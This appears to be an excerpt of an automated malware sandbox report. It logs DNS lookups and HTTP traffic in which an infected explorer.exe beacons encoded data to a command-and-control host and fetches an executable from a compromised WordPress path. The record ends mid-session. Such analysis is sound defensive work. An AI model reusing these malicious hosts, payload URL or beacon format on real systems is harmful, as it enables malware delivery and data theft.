Mar 10, 2021 11:43:34.693445921 CET	50969	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:34.739461899 CET	53	50969	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:37.497648001 CET	64362	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:37.547091961 CET	53	64362	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:41.002331018 CET	54766	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:41.059139013 CET	53	54766	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:43.899296999 CET	61446	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:43.956202030 CET	53	61446	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:46.781203985 CET	57515	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:46.827439070 CET	53	57515	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:49.630826950 CET	58199	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:49.679625988 CET	53	58199	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:52.461114883 CET	65221	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:52.507015944 CET	53	65221	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:55.287610054 CET	61573	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:55.333604097 CET	53	61573	8.8.8.8	192.168.2.5
Mar 10, 2021 11:44:27.637350082 CET	56562	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:44:27.694957972 CET	53	56562	8.8.8.8	192.168.2.5
Mar 10, 2021 11:44:28.357337952 CET	53591	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:44:28.414832115 CET	53	53591	8.8.8.8	192.168.2.5
Mar 10, 2021 11:44:28.914798975 CET	59688	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:44:28.969268084 CET	53	59688	8.8.8.8	192.168.2.5
Mar 10, 2021 11:44:30.078682899 CET	56032	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:44:30.137583017 CET	53	56032	8.8.8.8	192.168.2.5
Mar 10, 2021 11:44:30.645231009 CET	61150	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:44:30.706602097 CET	53	61150	8.8.8.8	192.168.2.5
Mar 10, 2021 11:44:31.198295116 CET	63458	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:44:31.279067039 CET	53	63458	8.8.8.8	192.168.2.5
Mar 10, 2021 11:44:31.886809111 CET	50422	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:44:31.932702065 CET	53	50422	8.8.8.8	192.168.2.5
Mar 10, 2021 11:44:32.513427019 CET	53247	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:44:32.605043888 CET	53	53247	8.8.8.8	192.168.2.5
Mar 10, 2021 11:44:33.546530008 CET	58544	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:44:33.605904102 CET	53	58544	8.8.8.8	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Mar 10, 2021 11:42:24.226293087 CET	192.168.2.5	8.8.8.8	d004	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 10, 2021 11:42:23.145108938 CET	192.168.2.5	8.8.8.8	0x7b8d	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:24.146101952 CET	192.168.2.5	8.8.8.8	0x7b8d	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:27.533092976 CET	192.168.2.5	8.8.8.8	0x5713	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:29.447962046 CET	192.168.2.5	8.8.8.8	0xe590	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:29.486794949 CET	192.168.2.5	8.8.8.8	0x5e74	Standard query (0)	zakriasons.co	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:33.592852116 CET	192.168.2.5	8.8.8.8	0x9043	Standard query (0)	estrelladamm.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:33.909949064 CET	192.168.2.5	8.8.8.8	0x22d4	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:36.868185997 CET	192.168.2.5	8.8.8.8	0x868d	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:39.704246998 CET	192.168.2.5	8.8.8.8	0x7672	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:42.530456066 CET	192.168.2.5	8.8.8.8	0xc16f	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:45.911041975 CET	192.168.2.5	8.8.8.8	0xadc8	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:48.731410980 CET	192.168.2.5	8.8.8.8	0xf032	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:51.556493998 CET	192.168.2.5	8.8.8.8	0x4ead	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:54.447309971 CET	192.168.2.5	8.8.8.8	0x1a6d	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:57.311022043 CET	192.168.2.5	8.8.8.8	0x3659	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:00.138197899 CET	192.168.2.5	8.8.8.8	0x52a6	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:03.027340889 CET	192.168.2.5	8.8.8.8	0x1577	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:05.854348898 CET	192.168.2.5	8.8.8.8	0x2e82	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:08.675479889 CET	192.168.2.5	8.8.8.8	0x810e	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:11.481430054 CET	192.168.2.5	8.8.8.8	0xb5c4	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:14.313855886 CET	192.168.2.5	8.8.8.8	0xbee4	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:17.140939951 CET	192.168.2.5	8.8.8.8	0xf7cb	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:19.973582029 CET	192.168.2.5	8.8.8.8	0x2c56	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:23.370452881 CET	192.168.2.5	8.8.8.8	0x506b	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:26.230215073 CET	192.168.2.5	8.8.8.8	0x5328	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:29.049068928 CET	192.168.2.5	8.8.8.8	0x838b	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:31.855731964 CET	192.168.2.5	8.8.8.8	0x16c4	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:34.693445921 CET	192.168.2.5	8.8.8.8	0x6aa2	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:37.497648001 CET	192.168.2.5	8.8.8.8	0xaafd	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:41.002331018 CET	192.168.2.5	8.8.8.8	0xea82	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:43.899296999 CET	192.168.2.5	8.8.8.8	0x7a5e	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:46.781203985 CET	192.168.2.5	8.8.8.8	0x3a3	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:49.630826950 CET	192.168.2.5	8.8.8.8	0x5c11	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:52.461114883 CET	192.168.2.5	8.8.8.8	0xf2fd	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:55.287610054 CET	192.168.2.5	8.8.8.8	0x1897	Standard query (0)	rusianlover.icu	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Mar 10, 2021 11:42:24.200372934 CET	8.8.8.8	192.168.2.5	0x7b8d	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:24.226169109 CET	8.8.8.8	192.168.2.5	0x7b8d	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:27.590620995 CET	8.8.8.8	192.168.2.5	0x5713	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:29.503112078 CET	8.8.8.8	192.168.2.5	0xe590	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:29.548923969 CET	8.8.8.8	192.168.2.5	0x5e74	No error (0)	zakriasons.co	104.21.55.228	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:29.548923969 CET	8.8.8.8	192.168.2.5	0x5e74	No error (0)	zakriasons.co	172.67.173.204	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:33.925044060 CET	8.8.8.8	192.168.2.5	0x9043	No error (0)	estrelladamm.icu	8.210.47.214	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:33.970722914 CET	8.8.8.8	192.168.2.5	0x22d4	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:36.922789097 CET	8.8.8.8	192.168.2.5	0x868d	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:39.761579037 CET	8.8.8.8	192.168.2.5	0x7672	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:42.584700108 CET	8.8.8.8	192.168.2.5	0xc16f	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:45.965420008 CET	8.8.8.8	192.168.2.5	0xadc8	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:48.790709972 CET	8.8.8.8	192.168.2.5	0xf032	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:51.610935926 CET	8.8.8.8	192.168.2.5	0x4ead	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:54.506834030 CET	8.8.8.8	192.168.2.5	0x1a6d	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:42:57.365310907 CET	8.8.8.8	192.168.2.5	0x3659	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:00.195586920 CET	8.8.8.8	192.168.2.5	0x52a6	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:03.081782103 CET	8.8.8.8	192.168.2.5	0x1577	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:05.908895969 CET	8.8.8.8	192.168.2.5	0x2e82	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:08.729815960 CET	8.8.8.8	192.168.2.5	0x810e	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:11.548894882 CET	8.8.8.8	192.168.2.5	0xb5c4	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:14.368622065 CET	8.8.8.8	192.168.2.5	0xbee4	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:17.195389032 CET	8.8.8.8	192.168.2.5	0xf7cb	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:20.028006077 CET	8.8.8.8	192.168.2.5	0x2c56	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:23.427532911 CET	8.8.8.8	192.168.2.5	0x506b	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:26.276403904 CET	8.8.8.8	192.168.2.5	0x5328	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:29.094966888 CET	8.8.8.8	192.168.2.5	0x838b	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:31.913132906 CET	8.8.8.8	192.168.2.5	0x16c4	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:34.739461899 CET	8.8.8.8	192.168.2.5	0x6aa2	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:37.547091961 CET	8.8.8.8	192.168.2.5	0xaafd	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:41.059139013 CET	8.8.8.8	192.168.2.5	0xea82	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:43.956202030 CET	8.8.8.8	192.168.2.5	0x7a5e	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:46.827439070 CET	8.8.8.8	192.168.2.5	0x3a3	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:49.679625988 CET	8.8.8.8	192.168.2.5	0x5c11	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:52.507015944 CET	8.8.8.8	192.168.2.5	0xf2fd	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)
Mar 10, 2021 11:43:55.333604097 CET	8.8.8.8	192.168.2.5	0x1897	No error (0)	rusianlover.icu	212.114.52.43	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

rusianlover.icu

zakriasons.co

estrelladamm.icu

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49715	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:42:27.643244982 CET	1160	OUT	POST /forum/logout.php?page=7 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 1081 Cache-Control: no-cache
Mar 10, 2021 11:42:27.732872963 CET	1162	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:42:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 31 32 63 0d 0a 08 81 c9 2b af 8e dd 14 bb 0f 76 4d 7e a5 75 e6 5c d8 2c 61 86 cb c1 42 a1 fd 81 78 73 f1 d2 f4 d2 01 3c d8 d5 00 50 de 0d a6 56 07 86 40 86 5d 60 b4 6a ec 32 c4 97 f6 0b 8d 84 b0 fb bb 28 20 f2 70 4d 2d fa d7 c4 e6 0c a5 c4 1e 83 2f 5c 82 29 85 32 99 a9 86 3f eb 0e b1 85 a8 6c 98 56 57 d2 c5 cc 2c 31 a2 6a 50 61 57 d1 08 19 df 70 5d 72 bb 8c 57 0f b3 17 65 cd e1 0e b6 05 08 13 eb 4c 59 ba f9 97 0c 6e b0 ed 7d 63 2b 04 db 13 77 22 85 fb f8 d3 6a f9 d6 39 50 24 d8 63 4a da 10 8f 5f de 17 65 44 a6 0b 0e ea 70 5a 81 19 66 cd 17 e2 50 79 ef b8 85 f9 21 89 1d 92 d6 69 5d 7e cf a6 9f 16 a0 40 9f e3 b3 24 6a ef 80 4a 5b a5 ab 69 74 47 b4 48 53 ac 2f be f6 e8 cb ce 5e c2 c0 1b b2 3e e6 79 37 ae bb 80 c1 40 84 8d 81 80 24 34 a8 35 ce f8 a8 03 cd b3 0f f2 d5 4a ff 1c 2a 2c bb 8b 70 d7 82 75 3e db a7 33 08 40 5c 55 9d 8e 19 9f 18 37 8c 72 a6 88 68 0b fa 0f 9e 64 ec 7c d6 f3 3c 5d cc e7 2a 93 3b 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 12c+vM~u\,aBxs<PV@]`j2( pM-/\)2?lVW,1jPaWp]rWeLYn}c+w"j9P$cJ_eDpZfPy!i]~@$jJ[itGHS/^>y7@$45J,pu>3@\U7rhd\|<];0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49716	104.21.55.228	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:42:29.589483976 CET	1163	OUT	GET /wp-includes/rest-api/endpoints/898/getwd.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: zakriasons.co Cache-Control: no-cache
Mar 10, 2021 11:42:29.635297060 CET	1164	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 10 Mar 2021 10:42:29 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 10 Mar 2021 11:42:29 GMT Location: https://zakriasons.co/wp-includes/rest-api/endpoints/898/getwd.exe cf-request-id: 08bd543071000005d0af0dd000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=92qhQgjQlrtNEAm5h4x68aAKVxl5xZz0aUW7G3Nlh1NqZ2qU5FURM1AossSoU2js7td3%2B1Z8M8jXIOAFs5bt6ruhhNR1g%2F7mlpsgU%2BTE"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62dbefc719f105d0-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49732	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:42:54.231937885 CET	5389	OUT	POST /forum/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 692 Cache-Control: no-cache Data Raw: 78 61 64 61 64 67 6a 3d 45 38 33 30 42 44 43 36 43 34 46 37 36 46 33 35 42 35 45 33 39 45 33 31 38 41 37 38 45 32 31 30 32 37 41 30 38 35 31 31 41 35 30 35 42 30 31 34 42 41 34 42 33 45 33 43 36 37 37 46 36 46 36 45 33 46 45 45 30 44 46 32 35 33 26 76 77 78 73 74 3d 36 39 30 34 36 34 34 31 26 7a 65 6a 69 6e 73 78 77 62 3d 30 38 63 30 66 39 37 33 32 65 64 65 63 37 37 64 30 33 64 63 64 65 39 30 65 36 63 38 34 32 35 34 36 35 34 63 37 31 31 35 33 62 63 62 30 39 33 62 30 63 62 63 62 63 39 30 62 36 35 65 62 63 32 35 33 62 34 38 65 37 63 66 63 36 37 63 63 38 31 34 36 32 37 31 32 36 32 37 30 36 35 36 66 36 37 36 35 34 35 62 63 30 38 34 62 32 38 35 30 31 32 35 64 31 62 38 61 39 32 61 65 63 65 39 65 66 39 62 39 35 38 36 34 64 32 66 61 65 33 31 39 64 64 33 62 39 38 36 61 65 32 35 33 33 31 33 31 61 65 34 61 34 64 34 33 39 35 36 33 32 36 32 66 64 66 35 32 64 31 66 61 62 65 65 31 61 31 61 34 33 31 61 66 66 31 35 35 61 38 34 63 35 34 31 33 35 31 37 38 64 61 61 39 37 39 37 31 66 33 33 36 39 62 64 34 33 65 32 33 63 31 31 34 65 61 33 34 39 37 36 37 64 39 66 61 38 30 64 38 34 37 31 66 63 61 32 35 62 65 66 33 65 61 36 39 36 39 66 62 37 37 38 63 66 39 66 39 31 38 35 31 63 32 38 36 66 38 64 33 33 39 38 30 37 38 30 31 65 63 35 34 35 31 35 63 32 61 31 61 35 36 34 32 31 39 36 62 33 63 63 36 64 36 38 36 38 33 33 34 30 39 36 66 37 32 61 35 32 39 33 33 31 62 31 30 36 61 31 39 33 62 64 30 63 64 66 39 61 36 33 30 66 61 31 64 35 36 34 39 37 65 63 64 35 37 36 36 36 64 37 65 64 31 30 65 63 61 33 64 35 36 61 38 39 63 33 39 66 63 62 37 66 36 32 61 34 32 32 33 31 63 31 33 62 31 31 66 61 32 31 63 39 62 64 36 38 34 36 34 31 33 34 34 33 30 64 63 62 37 38 34 32 64 37 64 37 37 63 35 38 34 32 62 35 66 33 39 63 35 39 39 38 36 62 34 35 62 63 34 37 62 31 61 63 38 33 61 34 34 33 63 32 64 30 33 31 38 62 65 37 63 63 38 62 31 30 31 34 64 34 31 66 37 34 33 31 39 63 36 38 66 35 61 30 30 33 65 34 64 64 32 39 30 33 36 33 66 37 33 32 63 33 36 66 63 66 66 64 36 35 32 34 33 34 65 66 63 30 30 63 36 37 37 33 32 39 63 37 64 65 36 64 39 34 31 37 64 32 36 33 64 37 34 33 65 64 39 62 30 62 38 61 35 32 Data Ascii: xadadgj=E830BDC6C4F76F35B5E39E318A78E21027A08511A505B014BA4B3E3C677F6F6E3FEE0DF253&vwxst=69046441&zejinsxwb=08c0f9732edec77d03dcde90e6c84254654c71153bcb093b0cbcbc90b65ebc253b48e7cfc67cc814627126270656f676545bc084b2850125d1b8a92aece9ef9b95864d2fae319dd3b986ae2533131ae4a4d439563262fdf52d1fabee1a1a431aff155a84c54135178daa97971f3369bd43e23c114ea349767d9fa80d8471fca25bef3ea6969fb778cf9f91851c286f8d339807801ec54515c2a1a5642196b3cc6d6868334096f72a529331b106a193bd0cdf9a630fa1d56497ecd57666d7ed10eca3d56a89c39fcb7f62a42231c13b11fa21c9bd68464134430dcb7842d7d77c5842b5f39c59986b45bc47b1ac83a443c2d0318be7cc8b1014d41f74319c68f5a003e4dd290363f732c36fcffd652434efc00c677329c7de6d9417d263d743ed9b0b8a52
Mar 10, 2021 11:42:54.303184986 CET	5416	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a 80 12 ad 62 ed 09 14 33 e6 27 99 02 07 5c c5 94 27 ad b0 33 b4 d2 3b ee 2f 5b b9 48 9f 67 0d 32 3c b7 25 f2 f1 4f c4 b2 36 63 03 78 24 50 80 18 b5 6c ea b0 e1 fe 9f 20 5a 90 d1 fa f5 ca 52 e1 ed 27 28 36 6b 8d 00 f2 f7 ea 4c de 70 a5 ad a0 a4 90 41 91 96 8c da c8 d6 80 37 7d f1 4c 0e b4 e0 67 97 ec 33 10 cc f7 91 56 4f 82 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6db3'\'3;/[Hg2<%O6cx$Pl ZR'(6kLpA7}Lg3VO0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49734	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:42:57.070462942 CET	5444	OUT	POST /forum/logout.php?page=1 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 635 Cache-Control: no-cache Data Raw: 73 71 6f 6d 6b 69 61 79 3d 37 32 36 63 39 34 31 65 32 34 35 64 65 39 36 36 64 38 64 65 26 71 6d 69 65 61 77 3d 34 37 33 36 33 31 33 38 26 75 75 75 75 3d 32 36 36 44 44 30 36 43 42 37 42 36 39 43 38 35 43 31 32 34 41 33 31 33 38 30 34 32 38 31 46 35 45 45 31 46 39 36 35 46 32 37 42 46 37 44 46 45 31 39 38 37 35 37 43 42 43 36 43 46 38 45 34 33 41 46 41 41 36 38 34 43 35 41 43 46 30 38 44 35 36 34 37 31 31 35 36 46 39 38 30 38 46 46 36 39 33 30 43 42 39 32 43 36 31 37 45 39 30 33 30 42 31 36 42 31 41 41 45 43 33 33 31 37 30 33 35 32 37 33 33 31 36 38 37 44 31 42 42 35 31 39 35 30 44 33 44 36 37 37 37 32 35 45 32 34 30 36 33 32 34 45 46 37 42 37 38 46 46 34 41 35 32 37 41 38 37 45 42 46 39 44 46 45 35 30 35 39 46 42 33 35 34 38 32 44 39 30 30 31 35 41 32 35 39 41 31 36 38 35 36 37 43 38 32 45 38 35 42 43 32 41 36 37 30 44 46 32 45 46 39 39 31 31 45 36 41 41 45 33 37 37 30 30 31 42 33 35 34 30 41 39 46 38 35 45 38 30 36 37 43 31 42 45 41 31 32 30 34 38 45 35 32 39 45 41 41 46 35 41 46 42 34 35 33 30 42 35 32 32 45 31 33 44 30 35 45 43 39 46 32 36 33 34 41 30 44 38 34 30 38 31 41 39 34 46 42 42 42 39 44 32 41 35 30 32 41 41 37 44 30 41 35 34 32 41 32 32 37 30 34 35 43 46 35 39 46 45 37 38 35 46 36 30 34 39 46 45 41 38 46 34 35 36 38 31 30 38 34 32 30 43 36 33 38 43 35 42 31 44 42 45 42 33 34 46 35 31 46 33 41 37 31 35 44 35 35 33 31 42 38 30 45 45 45 35 45 37 35 30 46 35 41 33 32 37 30 44 32 45 44 34 30 38 42 30 31 34 39 43 30 45 32 46 37 38 31 30 43 34 39 30 30 42 35 43 45 39 30 33 45 37 42 44 43 32 36 41 39 35 30 33 32 32 37 41 46 33 33 41 38 34 38 38 41 41 35 37 36 32 34 42 42 33 46 34 30 45 45 42 43 30 34 34 35 44 41 45 33 32 46 41 36 38 33 39 41 42 34 44 39 35 46 44 43 34 34 44 37 45 34 44 44 43 43 45 32 34 41 46 33 41 33 41 43 33 37 44 46 42 34 30 42 36 33 36 39 43 32 33 35 41 39 46 37 39 38 35 43 31 41 32 43 32 35 39 38 32 41 30 32 42 38 44 41 41 36 34 43 43 32 31 41 31 Data Ascii: sqomkiay=726c941e245de966d8de&qmieaw=47363138&uuuu=266DD06CB7B69C85C124A313804281F5EE1F965F27BF7DFE198757CBC6CF8E43AFAA684C5ACF08D56471156F9808FF6930CB92C617E9030B16B1AAEC331703527331687D1BB51950D3D677725E2406324EF7B78FF4A527A87EBF9DFE5059FB35482D90015A259A168567C82E85BC2A670DF2EF9911E6AAE377001B3540A9F85E8067C1BEA12048E529EAAF5AFB4530B522E13D05EC9F2634A0D84081A94FBBB9D2A502AA7D0A542A227045CF59FE785F6049FEA8F4568108420C638C5B1DBEB34F51F3A715D5531B80EEE5E750F5A3270D2ED408B0149C0E2F7810C4900B5CE903E7BDC26A9503227AF33A8488AA57624BB3F40EEBC0445DAE32FA6839AB4D95FDC44D7E4DDCCE24AF3A3AC37DFB40B6369C235A9F7985C1A2C25982A02B8DAA64CC21A1
Mar 10, 2021 11:42:57.148732901 CET	5447	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a 61 b2 48 10 16 fc dc 18 ee 94 cc eb c3 62 de ab f1 1d 25 1d 44 01 c3 54 23 34 5d 13 58 1b b2 f3 c9 f6 ea d4 56 bd f3 76 f9 0a 72 41 82 57 19 a6 42 88 63 31 ed 79 df 67 bb 5c 5a 6a ea ef 1e 58 be b4 2f ce 19 fe 46 19 02 12 bb a8 53 3f 4d 7f 97 f6 06 30 7d d0 40 75 52 22 cd d3 88 83 5e 11 a3 40 8f 5a 77 84 21 7b 2b 99 f1 52 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6daHb%DT#4]XVvrAWBc1yg\ZjX/FS?M0}@uR"^@Zw!{+R0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49741	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
